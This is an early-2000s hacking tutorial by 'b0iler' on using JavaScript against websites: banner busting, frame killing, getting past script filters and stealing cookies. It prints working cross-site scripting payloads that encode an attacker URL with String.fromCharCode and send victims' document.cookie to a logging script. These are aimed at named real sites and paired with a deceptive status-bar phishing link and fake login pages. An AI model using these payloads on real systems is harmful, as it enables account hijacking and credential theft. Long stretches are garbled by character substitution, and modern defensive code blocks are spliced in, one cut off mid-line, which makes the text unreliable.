
Hacking With Javascript

By b0iler
Written by b0iler for http://b0iler.eyeonsecurity.net

-things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull's javascript exploits, and the about:// exploit. Since so many people were asking when this tutorial would come out I decided to finally put it up. I'd appreciate some feedback. Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :(
-idea: cross site scripting by opening a new page in a frame and then writing to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.
Intro

Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.

There are a few benefits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website, making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source: if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript, making simple scripts and useful features for my site.

It was only after I was pretty good with javascript and got into hacking that I slowly saw its potential to be used maliciously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, and I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with and are purely theoretical. I hope you will realize how much javascript can aid a hacker.
1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion
1. Basic Syntax

The basics of javascript are fairly easy if you have programmed anything before. Although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics that javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin, if you don't know html you must learn it first!

Javascript starts with the tag <script language="javascript"> and ends with </script>. Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use <script type="javascript"> and don't finish it, all the html on the page underneath that is ignored. You can also use <script type="text/javascript"> and </script>.. either way is fine. I would also like to mention that many scripts have <!-- right after the <script type="text/javascript"> tag and //--> right before the </script> tag; this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the <!-- and //--> because that is how I learned to script and I got used to putting it in.

Javascript uses the same basic elements as other programming languages.. such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:

to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';

A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down let's see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:
<script type="text/javascript">
<!--
var name = 'b0iler';
var adjective = 'owns';
document.write(name+adjective);
//-->
</script>
First we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective', or b0ilerowns. If we wanted a space we could have done document.write(name+' '+adjective);

Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploiting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:

b0iler's website

We couldn't do:

document.write('b0iler's website');

because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:

document.write('b0iler\'s website');

There are two types of comments in javascript: // which only lasts till the end of the line, and /* which goes as far as possible until it reaches */. I'll demonstrate:
<script type="text/javascript">
<!--
document.write('this will show up'); // this will not, even document.write('blah'); won't
/* document.write('this also will not show up');
this won't either. document.write('or this');
it is all in the comments.. which aren't rendered by the browser */
//-->
</script>
The only thing that script will do is print "this will show up". Everything else is in comments, which are not rendered as javascript by the browser.

Flow control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways. The simplest is the if-then-else statement. Here is an example:
<script type="text/javascript">
<!--
var name = 'b0iler';
if (name == 'b0iler'){ document.write('b0iler is a really cool guy!'); }
else { document.write('b0iler can not define variables worth a hoot!'); }
//-->
</script>
Let's break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler"; if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:

if (name == 'b0iler')

as

if the variable name is equal to 'b0iler'

if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curly brackets) is skipped.

We now run into relational and equality operators. The relational operators are as follows:

> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the right it is true.

So let's run through a quick example of this. In this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).
<script type="text/javascript">
<!--
var lower = 1;
var higher = 10;
if (lower < higher) { lower = lower + 10; }   // we could have used lower += 10;
document.write('lower should be greater than higher.. or else I messed up.');
document.write('lower:'+lower+' and higher:'+higher);
//-->
</script>
an" no* the e2uality operators% you have alrea"y seen one of them in an eample: if !name DD
(b0iler($ the e2uality operators are DD for Ee2ual toE an" BD for Enot e2ual toE.? 0ake sure you
al*ays put t*o e2ual signs !DD$ because if you put only one !D$ then it *ill not check for e2uality.?
&his is a common mistake that is often overlooke".
Jo* *e *ill get into loops% loops continue the statements in bet*een the curly brackets OP until
they are no longer true. &here are 6 main types of loops + *ill cover: *hile an" for loops.? Here is
an eample of a *hile loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
var namenumber = 1;
while (namenumber < 5) {
    name = name + name;   // could have used: name += name;
    document.write(name);
    namenumber = namenumber + 1;
}
//-->
</script>
First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop; it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name;  document.write(name);  namenumber = namenumber + 1;  The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.

Let me quickly go over some shortcuts to standard math operators. These shortcuts are:

variable++;   // adds 1 to variable.
variable--;   // subtracts 1 from variable.
variable+= something;   // adds something to variable. Make sure to use 's if it is a string like: variable+= 'string';
variable-= 3;   // subtracts 3 from variable
variable*= 2;   // multiplies variable by 2.

Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example let's say you want to do the same thing as above. This is how you would do it with a for loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
for (var namenumber = 1; namenumber < 5; namenumber++) {
    name += name;   // this is the same as before: name = name + name;
    document.write(name);
}
//-->
</script>
First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want; it is all up to the scripter's preference.

Let's go over that for loop one more time, just for clarity: for (done only the first time; loop continues while this is true; done after every time through the loop)

That's it for learning javascript. This was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript than one I could ever write.

2. Places To Learn More Advanced Javascript

I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.
http://hot*ire".lycos.com/*ebmonkey/programming/#avascript/tutorials/tutorial6.html - goo"
eamples% not really a"vance".. prolly a me"ium level #avascript tutorial.
http://***.*eb"evelopers#ournal.com/articles/#sevents6/#sevents6.html - / #avascript tutorial on
event han"les. ,airly a"vance".
http://***.htmlguru.com - a classic site% go to the tutorials section an" learn a lot of a"vance"
#avascript ma"e easy.
http://server5.*sabstract.com/#avatutors - :oes over some specific aspects to a"vance"
#avascript *ork.? ?seful in many situations.
http://***.pageresource.com/#script/in"e=.htm - &he a"vance" string han"ling an" the forms
tutorials are goo"% + *oul" suggest rea"ing them if you *ish to get more into #avascripting.
<oolner"(s Javascript Gesource - / nice list of al the #avascript operators% statements% ob#ects..
although it might be alittle ol" + still use it all the time.
If you want to create your own javascripts for your site be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awesome DHTML (Dynamic HTML) feels really good ;) Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - <div>, <span>, and <layer>.

Here are some links to good dynamic html sites:

The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.
Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.
Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.
Intro to DHTML - Might be nice if you aren't as html and javascript knowledgeable as most DHTML beginners.

Good luck with your adventure into javascript =)

3. Banner Busting & Killing Frames

I call it banner busting: it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds for their banner, so that users' browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is: what tag does the banner they add come before or after? Try putting up a page with just:
<html>
<!-- blah -->
<body>
<!-- blah -->
text
<!-- blah -->
</body>
<!-- blah -->
</html>
no* uploa" that page an" vie* it in a bro*ser.? Qie* the source of the page an" fin" *here the
site a""e" it(s banner html.? +f it came after the ChtmlF an" before the Cbo"yF then you nee" to
see if it came before or after the CB-- blah --F *hich is in bet*een those.? +f it is before% then it is
the ChtmlF tag that is the key tag *hich the site a""s it(s banner after.? +f it is un"er the CB-- blah
--F than you kno* it puts it after the Cbo"yF tag.
)o no* that *e kno* *here the site a""s it(s banner html *hat "o *e "o to stop it?? We try to
make a EfakeE tag an" hopefully the site a""s it(s banner html to the fake one instea".? &hen *e
use #avascript to print the real one.? We can "o a fe* things% here is the list:
the basic CnoscriptF - this use" to *ork% as most banners or popups start *ith some #avascript%
but no* free sites have gotten smart an" automaticly a"" a C/noscriptF to stop it.
<noscript>
<keytag>   -this keytag is the decoy. Before/after this tag is where the banner would be.
</noscript>
<keytag>   -this keytag is the real one.
<script>, <style>, <xml> - these are a few examples of tags that will make the add-on html and javascript of the site's banner not render in the browser. Since it is not in the syntax of css, xml or javascript (it is html) users' browsers will just ignore it.
<style>
<keytag>   -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
<keytag>   -this keytag is the real one.
printing tags with javascript - this one was thought up by acecww and works really well. If you are having problems when you put the real keytag then try using javascript so the site doesn't even see it as the keytag. You get javascript to print the tag one letter at a time.
<script type="javascript">
<!--
document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>');
//-->
</script>
<style>
<keytag>   -this keytag is the decoy. Before/after this tag is where the banner would be.
</style>
+f all *orke" out you shoul" have a page *ith no annoying popups or flashing banners.? +f not +
guess you *ill have to play aroun" a little an" figure it out for yourself.? )ince every free host
uses "ifferent keytags an" metho"s of a""ing it(s banner + can(t go over them all one by one.
+ "eci"e" to go over a real eample of a free site that a"" popup a"s or banners to every page
you have.? +(ll be using angelfire since + hate them an" because that(s the one + picke" out of my
lucky hat.? Just remember that sites can change the *ay they a"" banners anytime they feel like%
so this metho" might not *ork the same *ay as + am sho*ing.? 3oing this also breaks the &-)
!&erms -f )ervice$ *ith your host% so you might get your site taken "o*n *ithout any *arning.?
/l*ays have complete backups of your site on your har""rive% espechially if you have a hacking
site or are breaking the &-).
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>
<!-- Beginning of Angelfire Ad Code Insertion -->
</noscript>
<script language="JavaScript">
<!--
(this is where the angelfire ad script would be.)
//-->
</script>
<!-- End of Angelfire Ad Code Insertion -->
<p> rest of test page</p>
</body>
</html>
------------------------
end
------------------------
As you can see angelfire puts their ad right after the <body> tag. All they are using to protect us from getting rid of the ad is a </noscript>, so.. we can put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So angelfire's server will add the javascript for their advertisement after the first <body> they see. That will put the ad after <style><body> and before </style>. This means that users' browsers will think that <body> and the angelfire ad is css (cascading style sheet).. which is the <style> tag. Since javascript and html cannot be in css the browser ignores it. We then put the real <body> after this and continue with our site.

About a month after I wrote this I came up with an idea of how to completely remove the advertisements sites put on your pages. I am not 100% sure it will work, but the basic idea is to have a cgi script open all the .html pages in your directory, remove the ad, and write the html back to the .html files. A few things might affect how well this works. First, if the script that adds the ad to the .html files is a cron job, but I doubt this, since it would put heavy strain on the system to search and write to all those files. Second, the script might be run whenever a .html file is edited; I am hoping that it is only run when a file is created or a file is uploaded. I'll test this out someday; if you want this script come bother me on irc about it and I might finish it =)

Killing Frames

Now I'll go over how to kill frames. The reason you would need this script is to hack namezero, nbci, and other companies which put your page in a frame. Killing a frame means to get rid of it so that your site is the one filling the whole window.

There is one solid way which has always worked for doing this. Not only will it bust out of companies' frames.. but if some lamer is leeching your site by using frames this will stop them. The script is as follows:
<script type="javascript">
<!--
if (self != top) top.location.replace(self.location);
//-->
</script>
What this script does is check if the current page is not the top (first) frame; if it isn't then it puts itself as the top frame, deleting the other frame from the browser window. Pretty handy trick =)

4. Getting Past Scripts That Filter Javascript

Let's say we are entering info into a guestbook. This would be put on the main page of the guestbook, and whenever anyone visited that page we want them to be sent to http://www.lameindustries.org. We would enter this in the guestbook:
<script type="javascript">
<!--
document.location = 'http://www.lameindustries.org';
//-->
</script>
Sometimes when you want to use javascript there is some form of filtering going on that stops the <script> tag from being rendered as usual. For those of you who know perl I will demonstrate.

[Line from a perl script that filters input for the <script> tag]

$input =~ s/<script/&lt;script/ig;

$input is what you submitted to the perl script. What it is doing is looking for <script in your input and replacing it with &lt;script. So how do you get around this? We can use the hex value of any or all characters in <script type="javascript">; the only characters you cannot do this for are the < and the > because they would not be rendered by the browser if you did. So now we enter something like this into the guestbook:
<&#115;cript type="javascript">
<!--
document.location = 'http://www.lameindustries.org';
//-->
</script>
Ho* "i" + kno* *hat the he value of (s( *as?? + #ust checke" an ascii chart an" a""e" 8 before
it an" I after it.? Hou can use this in the url of your bro*ser as *ell% #ust put R before the
number.? / chart ascii chart is available at
***.lamein"ustries.org/tutorials/tutorials/*tfWisWhe.shtml or man ascii if you run Nni.
&here are a fe* other situations *here #avascript can be useful.? +f you can get aroun" the filter
on a users email you can use your spoofing email skills to sen" an email from someone they
trust.? +f they open it you can have the email re"irect them to a page *hich says something like
Esession time" out% please login in againE an" have that form submitte" to a cgi script that logs
it.? &his *orks for a small percentage of people% but it is *orth a shot sometimes.
:etting by #avascript filters can lea" to you getting cookies for such things as forums% shopping
carts% sites% an" re"irecting users to the site of your choice.? /ny*here there is input that is
"isplaye" on a page *hich other people may visit !or you can make them visit$ there is an
opportunity to use #avascript to steal information.? +nfact #ust to"ay as + am *riting this it *as
foun" that lycos an" other search engines are vulnerable to #avascript in *ebsite(s "escriptions
an" names% rea" the slash"ot story for more info.? &his coul" lea" to 500R clicks for any search
your site turns up on I$.
Here is a cert a"visory concerning insertion of scripts !#avascript% vbscript% etc..$ inputte" into
scripts:
http://***.cert.org/a"visories/</-6000-06.html
up"ate: there has been a ne* a"visory for hotmail an" other sites *hich filter #avascript.? &he
problem lays in css an" the use of the ClinkF tag.? When the follo*ing co"e is use" the linke"
#avascript *ill be eecute"% making it possible to steal cookies% info% or re"irect users to a fake
login page.
C1+J. GL1D)&H1L)HLL& &H'LDEtet/#avascriptE )G<DEscript.#sEF
put that in the bo"y% preferably as the first thing.? -f course hotmail patche" it "ays after it *as
reporte"% but it stan" to sho* that hotmail is not 500R secure an" there *ill still be *ays in the
future to get scriptting eecute".? /lso other *eb base" email% guestbook% message boar"s% etc..
might be vulnerable to this.? Hou can use ol" hotmail eploits on many other scripts that allo*
input an" print them to a .html file.? + foun" this vulnerability in a script that cyberarmy.com ran for
their *eb base" mail% + #ust "i" a C8V55;Icript typeDE#ava8V55;IcriptEF an" re"irecte" the user to
a fake login page.? When they logge" in *ith their user an" pass*or" it sent them to a script that
*rote their info to a "atabase an" then logge" them into the *eb base" email script again.? &he
script *as ma"e by solutionscripts% an" cyberarmy is no longer vulnerable.
/lso note that normal tet fiel" input is not the only *ay to insert "ata into a script.? Hi""en fiel"s
an" environment variables are also sometimes vulnerable.? )ome scripts *ill filter all the tet
fiel"s% but *ill not filter the hi""en fiel"s% this allo*s you to insert #avascript or other nasty things.?
+ *on(t go to much into that since it *oul" re2uire a *hole nother tutorial an" because *ritting
#avascript isn(t the first thing you *oul" try to eploit *ith that.? Lnvironment variables that you
can eploit are usually referrer or user-agent% since those ten" to be the only ones ever *ritten to
a file% they are also the least filtere" input in my eperience.? +t(s much easier to fin" *ays to
insert #avascript if you can get ahol" of the source of the script.? &here are t*o easy *ays to "o
this% the first is to see if the script is open source% then go "o*nloa" an" revie* the co"e for
holes.? &he other is to look for other scripts/eploits that allo* you to vie* the source of other
scripts.? )o "o some research for other eploits in other scripts !or the *ebserver itself$.
;. )tealing <ookies
note: to "o this you(ll nee" a little bit of a"vance" #avascript kno*le"ge% an" some perl/php/asp
!or other server si"e language$.
)tealing cookies can be a "angerous problem for many sites.? +t all "epen"s on ho* the site sets
up it(s security.? +f a site #ust uses cookies to i"entify users than it coul" be vulnerable.? +f you
nee" to login then it is almost useless to try an" steal cookies.? ?nless of course the username
an" pass*or"s are store" in the cookie an" is not encrypte". )ometimes you are allo*e" access
*ithout logging in.? We *ill pick on http://ne*or"er.bo.sk since they stol" some 1+ tutorials% even
though they are not vuln to this because you must login to their site an" the user pass*or" is not
in the cookie.? !1ets see if they steal a tutorial *hich eplains ho* to eploit a hole in one of their
scripts I$? ?Ho* *e *ill be eploiting this bug is simple.? 1uckily cube left us a vulnerable script
on the site to play *ith. &he script is http://ne*or"er.bo.sk/bo.php7?
pr#Dne*or"er8ne*onlyD58gfDne*or"er8ttD*hat(sKne*.
What is vuln about this script?? +t "oesn(t escape the inputte" characters that are printe" to the
page. + tol" you escaping characters is important.? &he script instea" relies on a simple CpreF tag
to stop #avascript.? )o the first thing *e must "o is test an" see *hat character(s !if any$ are left
unescape" for us to use.? /fter a check for these characters: ( E I X C F / an" R *e fin" that he
"oes escape ( an" E.? +f he "i"n(t *e coul" eploit the php script itself an" have total control over
the site.? + *ill get to a little trick in a secon" *here *e can get #avascript to print out ( an" E.? But
for no* *e must stop that CpreF tag.? )o *e en" it *ith a C/preF then insert any #avascript *e
*oul" like.
+n the first paragraph + sai" that #avascript is mostly secure% because it cannot rea" or *rite any
files off a users har" "rive besi"es cookies.? Here *e *ill use #avascript to rea" the user(s cookie
for ne*or"er? an" then use #avascript to sen" them to a cgi script *here *e log their cookie to a
tt file.? /fter this *e check the log from the cgi script an" save the cookie *here our bro*ser
keeps them.? -r *e can get the username an" pass*or" from the cookie an" login to the site
!ne*or"er "oesn(t keep the user(s pass*or" in the cookie$.
)o no* to print the #avascript that *ill steal the cookie.? What *e are "oing is using the script that
prints out unescape" characters to the page as if it *as #avascript that *as really on that
*ebsite.? )o *e can vie* an" e"it user cookies.? &here are t*o main problems *e must
overcome.? ,irst *e nee" to print a string *ithout using ( an" E since the .php script on ne*or"er
"oes escape those characters.? Ho* *e "o this is by using #avascript *hich "oesn(t nee" ( or E
an" prints out any character.? &his is one *ay to "o it:
<script type=text/javascript> var u = String.fromCharCode(00068); u %2B= String.fromCharCode(00074); u %2B= String.fromCharCode(00074); u %2B= String.fromCharCode(00070); u %2B= String.fromCharCode(0003A); u %2B= String.fromCharCode(0002F); u %2B= String.fromCharCode(0002F); u %2B= String.fromCharCode(00073); u %2B= String.fromCharCode(00069); u %2B= String.fromCharCode(00074); u %2B= String.fromCharCode(00065); u %2B= String.fromCharCode(0002E); u %2B= String.fromCharCode(00063); u %2B= String.fromCharCode(0006F); u %2B= String.fromCharCode(0006D); u %2B= String.fromCharCode(0002F); u %2B= String.fromCharCode(00061); u %2B= String.fromCharCode(0002E); u %2B= String.fromCharCode(00063); u %2B= String.fromCharCode(00067); u %2B= String.fromCharCode(00069); u %2B= String.fromCharCode(0003F); u %2B= document.cookie; document.location.replace(u); //-->
</script>
We nee" to use R6B instea" of K because K becomes a space *hen you go to the script.? &here
is probably an easier *ay of "oing this besi"es using from<har<o"e% but + coul"n(t think of any
D$? &he 000=@ is ascii for h.? >9 is t.. !Hou can get an ascii chart from
http://***.elf2rin.com/"ocs/hakref/asciiWtable.html $:
=@Dh >9Dt >9Dt >0Dp 7/D: 6,D/ 6,D/ >7Ds =ADi >9Dt =;De 6LD. =7Dc =,Do =3Dm 6,D/ =5Da
6LD. =7Dc =>Dg =ADi 7,D? +n other *or"s it makes the var u e2ual to the string
http://site.com/a.cgi?
All right, so we got a string in a variable without using ' or ". var u = 'http://site.com/a.cgi?'; would be the same thing if the script didn't filter for ' and ". So now that we got the string going, what should we do? Well, what we are trying to do is get the cookie in a string and then send them to a cgi script that logs what's in the cookie. document.cookie is the cookie for that site. If there is more than one cookie then you have to use a little trickery; try this page for learning how to handle multiple cookies. Now we need to add the cookie to the end of the url. So:
u %2B= document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie (but user_s_cookie is actually the value in their cookie). So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be a cgi script that just logs whatever is inputted to it into a database. Another way to log their cookie would be to put something like:
<img src="http://site.com/somedir/(document.cookie)">
But since this script filters ' and " it would be a really long url to put fromCharCode's for every character.. Also, you would have to have access to the logs of the site in order to check what files were requested from the 'somedir' directory.
All cookie stealing techniques require some kind of script on your website to log the cookie when it is sent as a url.
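The fromCharCode chain above is exactly what an analyst finds in a web server log after an attack like this. The following is an added example, not part of b0iler's tutorial: a small decoder that percent-decodes a request line, rebuilds whatever string a String.fromCharCode() chain spells out, and lists the DOM features the script touches. The log line is constructed to match the payload format shown in the text; it is not a real capture, and all function names are my own.

```javascript
// Added example, not from the original tutorial: a decoder a defender can run over a
// suspicious URL or access-log line to see what a String.fromCharCode() chain spells out
// and which DOM features the script touches. The sample log line is constructed here to
// match the payload format shown in the text; it is not a real capture.

// Percent-decode until the text stops changing (bounded), so %252B -> %2B -> + is handled.
function fullyDecode(s) {
  let prev = null;
  let cur = s;
  for (let i = 0; i < 5 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur);
    } catch (e) {
      break; // malformed escape sequence: keep what we have
    }
  }
  return cur;
}

// Collect every String.fromCharCode(...) argument list, accept hex (0x68) or decimal (104)
// and comma-separated lists, and rebuild the string the chain produces.
function decodeCharCodeChain(text) {
  const re = /String\.fromCharCode\s*\(([^)]*)\)/gi;
  let out = '';
  let m;
  while ((m = re.exec(text)) !== null) {
    for (const arg of m[1].split(',')) {
      const t = arg.trim();
      if (t === '') continue;
      const code = /^0x/i.test(t) ? parseInt(t, 16) : parseInt(t, 10);
      if (!Number.isNaN(code)) out += String.fromCharCode(code);
    }
  }
  return out;
}

// Summarise a payload: the decoded text, the literal it builds, and indicator strings present.
function analysePayload(raw) {
  const decoded = fullyDecode(raw);
  const literal = decodeCharCodeChain(decoded);
  const indicators = ['document.cookie', 'location.replace', 'document.write', 'eval(']
    .filter((ind) => decoded.includes(ind));
  return { decoded, literal, indicators };
}

// Constructed sample: the tutorial-style payload as it would appear, URL-encoded, in a log.
const SAMPLE_LOG_LINE =
  'GET /a.cgi?search=var%20u%20%3D%20String.fromCharCode(0x0068)%3Bu%20%2B%3D%20' +
  'String.fromCharCode(0x0074,0x0074,0x0070,0x003A,0x002F,0x002F)%3Bu%20%2B%3D%20' +
  'String.fromCharCode(115,105,116,101,46,99,111,109,47,97,46,99,103,105,63)%3B' +
  'u%20%2B%3D%20document.cookie%3Bdocument.location.replace(u)%3B HTTP/1.0';

console.log(analysePayload(SAMPLE_LOG_LINE));
```

Run against the sample line it reports the literal http://site.com/a.cgi? together with the document.cookie and location.replace indicators, which is the whole story of the request in one glance. The bounded decode loop matters: the %2B trick the text describes is one layer of encoding, and attackers sometimes add a second layer to slip past filters that decode only once.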
Once you have a user's cookie there are 2 things it can be used for. Sometimes sites put their username and password right in the cookie. In this case you can just log into the site with that. Some other sites simply use a cookie to authenticate users; no login required.
Take for example www.geocities.com .. If you get a 404 error it will print out the url like this. Now if you have a cookie of a geocities member you can go to www.geocities.com and you will automatically be logged in. From there you have full control over their account.
But geocities did do something to stop this. They have their website go to http://geocities.yahoo.com .. So the cookie for users is actually a yahoo cookie ;( If you try the same trick where you go to a 404 file on yahoo it won't print the < and > characters. But if you were to find a script on yahoo that printed out < and > you could easily do this =) And there are scripts on yahoo.com which are vuln to cross site scripting; a few have been reported to bugtraq and I found another one.
So how would you get users to visit these urls? Try things like ...
Yeah all you redlite players, check out this hidden pick, funny as hell: Check this page out! Or better yet.. load it in a frame that is 0% large. The user won't even know what hit them =)
oh, the source for that redlite link is:
<a href="http://www.redlite.org/signup/signup2.php?username=<script type=text/javascript>var u
= String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u %2B= document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
onMouseOut="window.status='';return true"> Check this page out! </a>
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return true"
and
onMouseOut="window.status='';return true"
at the end.. This is to trick the user into thinking that the link leads somewhere else. Again, using javascript to manipulate what the user sees to help trick them.
Another script in the edge engine that is vulnerable to cross site scripting is board.php, here is the exploit
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0
sure am glad bsrf doesn't run it ;O)
So how can a coder stop this vulnerability? I would say never print user inputted data back to the user. Also filter out <, >, and unpack all url encoding before filtering input. I found a way to steal cookies in the old ikonboard using the profile.cgi; although it wasn't too big a deal since there were more serious holes in ikonboard, it still was bad programming practice to print unfiltered input. Now ikonboard does not use profile.cgi, it doesn't print inputted data to the screen, and it filters data. Usually web based email scripts are very vulnerable to cross site scripting.. and that holds true for a vulnerability in Solution Script's alais-mail script that I found last year.
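To make the fix concrete, here is an added example (not code from the tutorial or from any of the scripts it names) that puts the redlite-style filter, which only strips ' and ", next to what the paragraph above recommends: encode output instead of blacklisting, decode url encoding before inspecting input, and keep the session cookie out of document.cookie's reach. The sample payload is constructed to match the shape shown in the text, and all function names are my own.

```javascript
// Added example, not from the original tutorial: the quote-stripping filter the text
// describes beside the fix it recommends. Names and the sample payload are constructed.

// What the vulnerable signup page effectively did: echo the username with only quotes removed.
// The String.fromCharCode() payload needs no quotes, so this filter never fires.
function renderGreetingVulnerable(username) {
  const filtered = username.replace(/['"]/g, '');
  return '<p>Welcome, ' + filtered + '!</p>';
}

// HTML-entity encode every character that can change the meaning of markup. Output encoding
// makes injected text render as text no matter which characters the attacker avoided.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderGreetingSafe(username) {
  return '<p>Welcome, ' + escapeHtml(username) + '!</p>';
}

// "Unpack all url encoding before filtering": inspect the fully decoded value, so that
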